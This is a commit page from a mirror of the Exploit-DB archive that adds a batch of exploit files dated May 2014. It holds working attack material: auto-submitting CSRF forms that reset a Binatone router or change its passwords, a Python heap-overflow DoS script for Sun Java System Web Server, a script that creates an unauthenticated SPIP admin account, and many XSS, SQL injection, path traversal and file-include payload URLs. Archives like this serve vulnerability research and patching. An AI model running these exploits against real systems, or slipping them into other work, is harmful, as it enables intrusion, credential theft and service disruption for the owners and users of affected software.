bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_23_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-23 04:36:15 +00:00
parent 5b5e154bd7
commit 3a4999409a
25 changed files with 864 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
files.csv
View file

@ -30111,6 +30111,7 @@ id,file,description,date,author,platform,type,port
33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80
33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002
33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
@ -30135,3 +30136,26 @@ id,file,description,date,author,platform,type,port
33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 'recent.php' Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33452,platforms/php/webapps/33452.txt,"Imagevue r16 'amount' Parameter Cross-Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0
33456,platforms/php/webapps/33456.txt,"Stardevelop Live Help 2.6 'SERVER' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 Cross Site Scripting and Remote File Include Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 'referer' Parameter Cross Site Scripting Vulnerability",2009-12-31,indoushka,php,webapps,0
33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 Cross Site Scripting And Directory Traversal Vulnerabilities",2009-12-31,indoushka,php,webapps,0
33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33461,platforms/php/webapps/33461.txt,"PHPCart 3.1.2 'search.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33462,platforms/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 'admin.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33463,platforms/php/webapps/33463.txt,"VisionGate 1.6 'login.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0
33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0
33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 'stop' Parameter Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0
33466,platforms/php/webapps/33466.txt,"pL-PHP 0.9 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0
33467,platforms/php/webapps/33467.txt,"WMNews 'admin/wmnews.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0
33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0
33469,platforms/php/webapps/33469.txt,"LXR 0.9.x Cross Referencer Multiple Cross Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0
33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0
33471,platforms/hardware/remote/33471.txt,"D-LINK DKVM-IP8 'auth.asp' Cross Site Scripting Vulnerability",2010-01-06,POPCORN,hardware,remote,0
33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 HTTP 'TRACE' Heap Buffer Overflow Vulnerability",2010-01-06,"Evgeny Legerov",multiple,dos,0
33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0
33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0
33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0

Can't render this file because it is too large.

9
platforms/hardware/remote/33471.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37646/info
D-LINK DKVM-IP8 is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example data is available:
The POST variable nickname has been set to 1>">">

104
platforms/hardware/webapps/33455.txt Executable file
View file

@ -0,0 +1,104 @@
# Exploit Title: Binatone DT 850W Wireless Router - Multiple CSRF Vulnerabilities
# Date: 05/20/2014
# Author: Samandeep Singh - SaMaN( @samanL33T )
# Vendor Homepage:http://www.binatonetelecom.in/4port-adsl2-wifi-router1.html
# Category: Hardware/Wireless Router
# Firmware Version: T6W-A1.005 and below
# Tested on: Binatone DT 850W Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------------------------------
Disclosure Timeline
~~~~~~~~~~~~~~~~~~~
04/23/2014 Contacted Vendor
04/26/2014 Vendor Replied
04/26/2014 Vulnerability Explained (No reply received)
05/04/2014 Vendor notified about full disclosure in 15 days (No reply)
05/20/2014 Full Disclosure
Technical Details
~~~~~~~~~~~~~~~~~~
Binatone DT 850W Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password, SSId of Wireless network,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.
Exploit Code
~~~~~~~~~~~~~
Change Wifi (WPA2/PSK) password & SSID by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/Forms/home_wlan_1"
method="POST" name="form">
<input type="hidden" name="wlanWEBFlag" value="0">
<input type="hidden" name="AccessFlag" value="0">
<input type="hidden" name="wlan_APenable" value="1">
<input type="hidden" name="Countries_Channels" value="INDIA">
<input type="hidden" name="Channel_ID" value="00000000">
<input type="hidden" name="BeaconInterval" value="100">
<input type="hidden" name="RTSThreshold" value="2347">
<input type="hidden" name="FragmentThreshold" value="2346">
<input type="hidden" name="DTIM" value="1">
<input type="hidden" name="WirelessMode" value="802.11b+g+n">
<input type="hidden" name="WLANChannelBandwidth" value="20/40 MHz">
<input type="hidden" name="WLANGuardInterval" value="AUTO">
<input type="hidden" name="WLANMCS" value="AUTO">
<input type="hidden" name="wlan_MBSSIDNumber" value="2">
<input type="hidden" name="WLSSIDIndex" value="1">
<input type="hidden" name="ESSID_HIDE_Selection" value="0">
<input type="hidden" name="ESSID" value="[SSID]">
<input type="hidden" name="WEP_Selection" value="WPA2-PSK">
<input type="hidden" name="TKIP_Selection" value="AES">
<input type="hidden" name="PreSharedKey" value="[PASSWORD]">
<input type="hidden" name="WPARekeyInter" value="3600">
<input type="hidden" name="WDSMode_Selection" value="0">
<input type="hidden" name="WLAN_FltActive" value="0">
<input type="hidden" name="wlanRadiusWEPFlag" value="0">
<input type="hidden" name="MBSSIDSwitchFlag" value="2">
</form>
</body>
</html>
Factory Reset Router Settings by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://TARGET/IP]Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="1">
</form>
</body>
</html>
Change Router's Admin Password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/Forms/tools_admin_1"
method="POST" name="form">
<input type="hidden" name="uiViewTools_Password" value="[PASSWORD]">
<input type="hidden" name="uiViewTools_PasswordConfirm" value="[PASSWORD]">
</form>
</body>
</html>
Restart Router by CSRF
~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="document.form.submit();">
<form action="http://TARGET/IP]/Forms/tools_system_1"
method="POST" name="form">
<input type="hidden" name="restoreFlag" value="0">
</form>
</body>
</html>
--
SaMaN
twitter : @samanL33T <https://twitter.com/samanL33T>

54
platforms/multiple/dos/33472.py Executable file
View file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/37648/info
Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability.
Attackers can exploit this issue to crash the affected application or to obtain potentially sensitive information that may aid in further attacks.
The following are vulnerable:
Sun Java System Web Server 7.0 prior to 7.0 Update 8
Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12
Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13
#!/usr/bin/env python
# sun_trace.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import socket
import sys
def send_req(host,port):
buf="TRACE /%s HTTP/1.0\n" % ("A"*4074)
for i in range(0,10):
buf += "%d"%i + ":\n"
for i in range(ord('a'), ord('z')):
buf += chr(i) + ":\n"
buf += "\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
sock.sendall(buf)
resp=""
while 1:
s= sock.recv(4000)
if len(s)<1: break
resp+=s
print list(resp)
if __name__=="__main__":
if len(sys.argv)<3:
print "usage: %s host port" % sys.argv[0]
sys.exit()
send_req(sys.argv[1],int(sys.argv[2]))

70
platforms/php/webapps/33425.py Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/env python
# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
# Date: 04/30/2014
# Flaw finder : Unknown
# Exploit Author: Gregory DRAPERI
# Email: gregory |dot| draperi |at| gmail |dot| com
# Google Dork : inurl="spip.php"
# Vendor Homepage: www.spip.net
# Software Link: http://files.spip.org/spip/archives/
# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
# Tested on: Windows 7 - SPIP 2.2.21
# CVE : CVE-2013-2118
'''
---------------------------------------------------------------------------------------------------------
Software Description:
SPIP is a free software content management system
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
'''
import urllib, urllib2
import cookielib
import sys
import re
def send_request(urlOpener, url, post_data=None):
request = urllib2.Request(url)
url = urlOpener.open(request, post_data)
return url.read()
if len(sys.argv) < 4:
print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
exit()
base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
formulaire_data = {'var_ajax' : 'form',
'page' : 'identifiants',
'mode' : '0minirezo',
'formulaire_action' : 'inscription',
'formulaire_action_args' : m.group(0),
'nom_inscription' : login,
'mail_inscription' : mail,
'nobot' : ''
}
formulaire_data = urllib.urlencode(formulaire_data)
send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"
print "[+] You should receive an email with credentials soon :) "

10
platforms/php/webapps/33456.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37558/info
Stardevelop Live Help is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Live Help 2.6.0 is vulnerable; other versions (or products that include Live Help) may also be affected.
http://www.example.com/livehelp/index_offline.php?SERVER=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/livehelp/frames.php?SERVER=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&URL=www.example.org&SESSION=indoushka@example.org

10
platforms/php/webapps/33457.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37559/info
Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these issues to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. The attacker may also execute script code in an unsuspecting user's browser or steal cookie-based authentication credentials. Other attacks are also possible.
Photokorn 1.542 is vulnerable; other versions may also be affected.
http://www.example.com/sm-p1542/install.php?lang=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/sm-p1542/index.php?lg=http://www.example.net/c.txt?

9
platforms/php/webapps/33458.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37562/info
Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Discuz! 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/member.php?action=logout&referer=http://127.0.0.1/1"'><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

12
platforms/php/webapps/33459.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37564/info
DieselPay is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker could exploit these vulnerabilities to obtain sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials.
DieselPay 1.6 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/dieselpay/index.php?read=<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://www.example.com/dieselpay/index.php?read=../../../../../../../../boot.ini

9
platforms/php/webapps/33460.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37566/info
Magic News Plus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Magic News Plus 1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/>[xss]

9
platforms/php/webapps/33461.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37567/info
PHPCart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
PHPCart 3.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin/search.php?action=submit&order_id=[xss]

10
platforms/php/webapps/33462.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37568/info
VirtuaNews Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VirtuaNews Pro 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/upload/admin.php?username=[xss]

9
platforms/php/webapps/33463.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37569/info
VisionGate is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VisionGate 1.6 is vulnerable; other versions may also be affected.
http://www.example.com/login.php?url=[xss]

11
platforms/php/webapps/33464.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37573/info
Discuz! is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Discuz! 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/Discuz/post.php?action=edit&fid=1&tid=17&pid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&page=1
http://www.example.com/Discuz/misc.php?action=emailfriend&tid=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

9
platforms/php/webapps/33465.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37574/info
SLAED CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SLAED CMS 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?name=Recommend&stop=<ScRiPt+src=http://127.0.0.1/xss.js?213771818860></ScRiPt>

9
platforms/php/webapps/33466.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37593/info
pL-PHP is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
pL-PHP 0.9 beta is vulnerable; other versions may also be affected.
http://www.example.com/files/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

7
platforms/php/webapps/33467.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37600/info
WMNews is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wmnews/admin/wmnews.php/>"><ScRiPt>alert(213771818860)</ScRiPt>

9
platforms/php/webapps/33468.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37605/info
MercuryBoard is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MercuryBoard 1.1.5 is vulnerable; other versions may also be affected.
http://www.example.com/mercuryboard-1.1.5/index.php/>&#039;><ScRiPt>alert(213771818860)</ScRiPt>

9
platforms/php/webapps/33469.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37612/info
LXR Cross Referencer is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
LXR Cross Referencer 0.9.5 and 0.9.6 are affected; other versions may also be vulnerable.
http://www.example.com/lxr/ident?i=<script>alert('XSS')</script>

15
platforms/php/webapps/33470.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37613/info
LineWeb is prone to multiple remote vulnerabilities:
- Multiple local file-include vulnerabilities
- An SQL-injection vulnerability
- A security-bypass vulnerability
An attacker can exploit these issues to execute arbitrary local files within the context of the webserver process, obtain sensitive information, compromise the affected application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LineWeb 1.0.5 is vulnerable; other versions may also be affected.
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=index.php?op=../../../../../../../etc/passwd%00
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27

7
platforms/php/webapps/33473.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37654/info
RoundCube Webmail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123

7
platforms/php/webapps/33474.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37655/info
The DM Orders component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1

235
platforms/php/webapps/33475.txt Executable file
View file

@ -0,0 +1,235 @@
source: http://www.securityfocus.com/bid/37669/info
dotProject is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dotProject 2.1.3 is vulnerable; other versions may also be affected.
== Company ===
The company creation screen fails to filter form details before creating
a new company.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new company
2. Click the &#039;Companies&#039; link in the top navigation bar
3. Click the &#039;new company&#039; button in the upper right
4. Fill in "<script>alert(&#039;xss&#039;);</script>" for each field except for
phone, phone2, and fax. These fields restrict the input size so simply
put "<script>alert(&#039;1&#039;);</script>" in these fields.
5. Click the &#039;submit&#039; button in the lower right hand corner
6. On the resulting screen the company name XSS will appear.
7. To view the other company XSS attacks browse to
index.php?m=companies&a=view&company_id=X where &#039;X&#039; is the id of the new
company. Alternatively you can click on the &#039;Projects&#039; link in the top
navigation then the &#039;new project&#039; button in the upper right. Create a
new project, selecting the newly created company, which will appear as a
blank choice in the company drop down list. Save the project and then
in the project list click on the company name.
Impact
Any user with the permissions to create new companies can expose other
users of dotProject to XSS attacks.
== Project ===
The project creation screen fails to filter form details before creating
a new project.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new project
2. Click the &#039;Projects&#039; link in the top navigation bar
3. Click the &#039;new project&#039; button in the upper right
4. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Project Name&#039;,
&#039;URL&#039;, &#039;Starting URL&#039;, and &#039;Description&#039; fields
5. Click the &#039;submit&#039; button in the lower right hand corner
6. On the resulting screen the project name XSS will appear.
7. To view the other project XSS attacks browse to
index.php?m=projects&a=view&project_id=X where &#039;X&#039; is the id of the new
project.
Impact
Any user with the permissions to create new projects can expose other
users of dotProject to XSS attacks.
== Task ===
The task creation screen fails to filter form details before creating a
new task.
Proof of Concept
1. Log into dotProject as a user with privileges to create a task
2. Click the &#039;Projects&#039; link in the top navigation bar
3. Click on a project name to which the user account has permissions
4. Click the &#039;new task&#039; button in the upper right
5. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Task Name&#039;, &#039;Web
Address&#039;, &#039;Description&#039;, and &#039;Description&#039; fields
6. Click on the &#039;Dates&#039; tab and select an appropriate date
7. Click the &#039;save&#039; button in the lower right hand corner
8. On the resulting screen the task name XSS will appear.
9. To view the other task summary XSS attacks browse to
index.php?m=tasks&a=view&task_id=X where &#039;X&#039; is the id of the new task.
Impact
Any user with the permissions to create new tasks can expose other users
of dotProject to XSS attacks.
== Task Log ===
The task log creation screen fails to filter form details before
creating a new task log.
Proof of Concept
1. Log into dotProject as a user with privileges to create a task
2. Click the &#039;Tasks&#039; link in the top navigation bar
3. Click on a task name to which the user account has permissions
4. Click the &#039;New Log&#039; tab
5. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Summary&#039;, and
&#039;Description&#039; fields, enter ""><script>alert(&#039;log url&#039;);</script>" for
the &#039;URL&#039; field
6. Click the &#039;update task&#039; button in the lower right hand corner
7. On the resulting screen the task name XSS will appear.
8. To view the other task log XSS attacks browse to
index.php?m=tasks&a=view&task_id=X where &#039;X&#039; is the id of the task.
Impact
Any user with the permissions to create new task logs (virtually all
dotProject users) can expose other users of dotProject to XSS attacks.
== Files ===
The file attachment screen fails to filter form details before creating
a new file attachment.
Proof of Concept
1. Log into dotProject as a user with privileges to create a file
2. Click the &#039;Files&#039; link in the top navigation bar
3. Click on a &#039;new folder&#039; button in the upper right
4. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Folder Name&#039;, and
&#039;Description&#039; fields
5. Click on the &#039;new file&#039; button in the upper right
6. Observer the &#039;Folder name&#039; XSS
7. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Description&#039; field
and choose a file to upload
8. Click the &#039;submit&#039; button in the lower right hand corner
9. On the resulting screen the file description XSS will appear.
Impact
Any user with the permissions to create new files can expose other users
of dotProject to XSS attacks.
== Events ===
The events screen fails to filter form details before creating a new events.
Proof of Concept
1. Log into dotProject as a user with privileges to create an event
2. Select &#039;Event&#039; from the &#039;-New Item-&#039; drop down in the upper right or
navigate to index.php?m=calendar&a=addedit
3. Fill in "<script>alert(&#039;xss&#039;);</script>" for the &#039;Event Title&#039;, and
&#039;Description&#039; fields
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the View Event screen
index.php?m=calendar&a=view&event_id=X where &#039;X&#039; is the id of the new event.
Impact
Any user with the permissions to create new events can expose other
users of dotProject to XSS attacks.
== Contacts ===
The contacts screen fails to filter form details before creating a new
events.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new contact
2. Select &#039;Contact&#039; from the &#039;-New Item-&#039; drop down in the upper right
or navigate to index.php?m=contacts&a=addedit
3. Fill in "<script>alert(&#039;xss&#039;);</script>" for every field
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the View Contact screen
index.php?m=contacts&a=view&contact_id=X where &#039;X&#039; is the id of the new
contact.
Impact
Any user with the permissions to create new contacts can expose other
users of dotProject to XSS attacks.
== Tickets ===
The Submit Trouble Ticket screen fails to filter form details before
creating a new ticket.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new ticket
2. Click the &#039;Tickets&#039; link in the top navigation bar or navigate to
index.php?m=ticketsmith&a=post_ticket
3. Fill in "<script>alert(\&#039;xss\&#039;);</script>" for the &#039;E-mail&#039; field
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the View Contact screen
index.php?m=ticketsmith&a=view&ticket=X where &#039;X&#039; is the id of the new
contact.
Impact
Any user with the permissions to create new tickets can expose other
users of dotProject to XSS attacks.
== Forums ===
The Add Forum screen fails to filter form details before creating a new
forum.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new forum
2. Click the &#039;Forums&#039; link in the top navigation bar or navigate to
index.php?m=forums&a=post_ticket
3. Fill in "<script>alert(\&#039;xss\&#039;);</script>" for the &#039;Forum Name&#039; and
&#039;Description&#039; fields
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the Forums screen index.php?m=forums
Impact
Any user with the permissions to create new tickets can expose other
users of dotProject to XSS attacks.
== Forum Topics ===
The Forum Add Message screen fails to filter form details before
creating a new topic.
Proof of Concept
1. Log into dotProject as a user with privileges to create a new forum
topic
2. Click the &#039;Forums&#039; link in the top navigation bar or navigate to
index.php?m=forums
3. Click on the name of a forum
4. Click on the &#039;start a new topic&#039; button in the upper right
